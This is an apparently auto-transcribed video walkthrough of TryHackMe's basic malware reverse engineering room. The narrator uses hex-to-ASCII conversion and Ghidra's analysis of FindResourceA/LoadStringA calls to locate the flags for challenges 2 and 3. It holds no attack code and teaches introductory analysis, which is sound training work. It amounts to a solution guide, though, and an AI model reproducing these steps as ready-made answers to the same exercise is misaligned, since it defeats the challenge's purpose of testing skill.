copy paste everything and replace all hexadecimal things into ASCII code. So I think it will show us flag in ASCII code. That's why I'm just converting this hexadecimal value into ASCII. You just need to learn about what is binary, what is hexadecimal, what is decimal, so you will get better understanding about computer language. In decimal it is like 0 to 9 only words. Thereafter in hexadecimal it is starting from 0 1 2 3 4 5 6 7 8 9, then A B C D E F. Okay, so I have simply copied this hexadecimal value, then search for hex to ASCII on Google. So there will be our first link of rapidtables.com. So I'm just clicking on that. Paste our value in hex input by Control V. Okay, site is still loading, so just wait for some time and neglect this add. Click on convert and we got the flag here. So in the beginning it is like lag, so F word is not present. We need to add F word in this. So if you analyze this code browser, the value of local to C was in plain text format, so here is our value of F. So we just need to copy that value and add this F in front of that. It is value of local to C. So I'll just use Control C, open TryHackMe, scroll down below, open task 3 and paste everything by Control V, click on submit. So this is how you can easily solve challenge 2 on this machine. In past two videos, we have solved challenge 1 as well as challenge 2 of this basic malware reverse engineering room. In this video, we are going to solve challenge 3, which is a task 4. So challenge 3, I will simply first of all download this task file by clicking on blue button, then save this file, click on OK. This executable prints an MD5 hash on the screen when executed. Can you grab the exact flag? Okay, this is also performing same thing like it was performing in challenge 1 and challenge 2. So question is, what is the flag of which that the MD5 gets generated? So here also we need to find the flag, and we have already downloaded this file. So I will just go to downloads folder. Here we need to extract this. So I will simply right click on the string3.zip file, then click on extract here. So we need to paste the password here. For that, open TryHackMe and extend task1 introduction. Here is our zip file password, malware tech. So copy this password by Control C, open this unzip tool, and here is our string3.exe file. So to open this in GHydra, first of all, I will start the terminator. Now click on terminator icon and enter the command GHydra to open graphical hydra. So wait for some time until GHydra means graphical hydra gets loaded. GHydra is loaded now. It is showing tip of the day. So I will simply close this tip. Now you can see it is showing string 1 and string 2 which we used before. Now we need to load string3.exe. So go to file, import file and select string3.exe file. Click on select file to import. Now it is started importing string3.exe underscore file. So just wait for some time and it is showing its format. So it is a portable executable file which have language x86 Windows. uh, so our log file will be stored in malware reverse engineering folder. Click on OK. Now this is loading the language x86 and file import is completed. Okay, now just minimize this import result summary and click on OK. Double click on string3.exe, else you can select this and click on that dragon icon to load this Ghidra browser. Actually my system is little slow, that's why it is taking some time to load the code browser. So just wait for some time. Now click on yes if you want to analyze this file. So it have not analyzed this, we need to analyze it manually. So I will simply click on yes button. So this will start the analyzing all the files and folders into that uh, string3.exe file. After this you need to select analyzer name. So I'm just keeping it by default and click on analyze button. Now at the bottom right corner you can see the progress that it is started analyzing all the functions. So what I will do, I will just extend the function folder and try to find main function there. I don't think so that this folder this function also contains main file. So we are also going to analyze entry file here. So just wait for some time until it stop the scanning all the children file. So there are plenty of files like memory copy, memory set, sprintf, auto analyze summary. Click on OK. Let's try to open this memory copy file before entry file. It is a defined string at the right side. I will just close this defined string. So extend this window, close this defined strings. Okay, so this memory copy file doesn't contain anything here. There are only comments and few things are loading. Memory set also doesn't contain anything, and yes, printf also doesn't contain anything. So open entry file again. Here what it is doing, so it is just taking a value of local 4a as a character, then there is an undefined variable, then in local C it is loading one external resource. It is a find resource a. Okay, it is external resource. So it is loading from kernel32.dll file. So here you can see it is loading from kernel32.dll file, and thereafter there is another function called load string a, and it is also loading from external file user32.dll. Okay, so both of these function are called from another file, and in load string dot a, so there is one h instance 0x0, thereafter so its value is 0, thereafter one hexadecimal value 110. Okay, so I think we need to find its decimal value. So hexadecimal value means 0 to 9, and thereafter abcd up to f, and decimal means 0 to 9 only. So we are just going to convert this hexadecimal into decimal. So simply search for hex to decimal on Google. Click on hexadecimal to decimal converter. So this is a converter from rapidtables.com. I will enter that hex value 110 and its decimal value is 272. Okay, so keep this in mind, we will need this in future reference. Now I don't think nothing is there, so I will just go to Windows, then find for defined strings. Okay, so in defined string, so it is printing that we have been compromised. Okay, and nothing is there, so it is calling kernel32.dll, which we seen before. Thereafter there are few so many flags. So there is our first flag in default string.xml, sorry, default strings. What's our product? Okay, there are plenty of flags, so we don't know which is the original flag. So I will just click on that default string, and here are few many some more flags like this copy or provision disclaimer, license within services. Okay, there are so many flags, and after that you can see it is showing its string id value. So it is 0 1 2 3. Let's analyze how many flags are there. So I will just scroll down below. Okay, there are hundreds of flags, like there are nearly 500 flags, 500 plus flags. So what we can do, open browser, and here you can see our converted value was 272. So maybe this will be our answer. So just open GHydra browser again and search for flag number 272. Okay, scroll down below. Okay, there is something like string table or resource, and here is our flag number 272. I think this will be our answer. Resources are popular for malware. So I am just selecting this flag and copy this by Ctrl C. Else you can right click on that, copy it, open web browser, go to TryHackMe. Now extend task 4, challenge 3 and paste our flag here by Ctrl V. Click on submit and we have successfully solved this challenge. So this is how you can easily solve basic malware reverse engineering room on TryHackMe.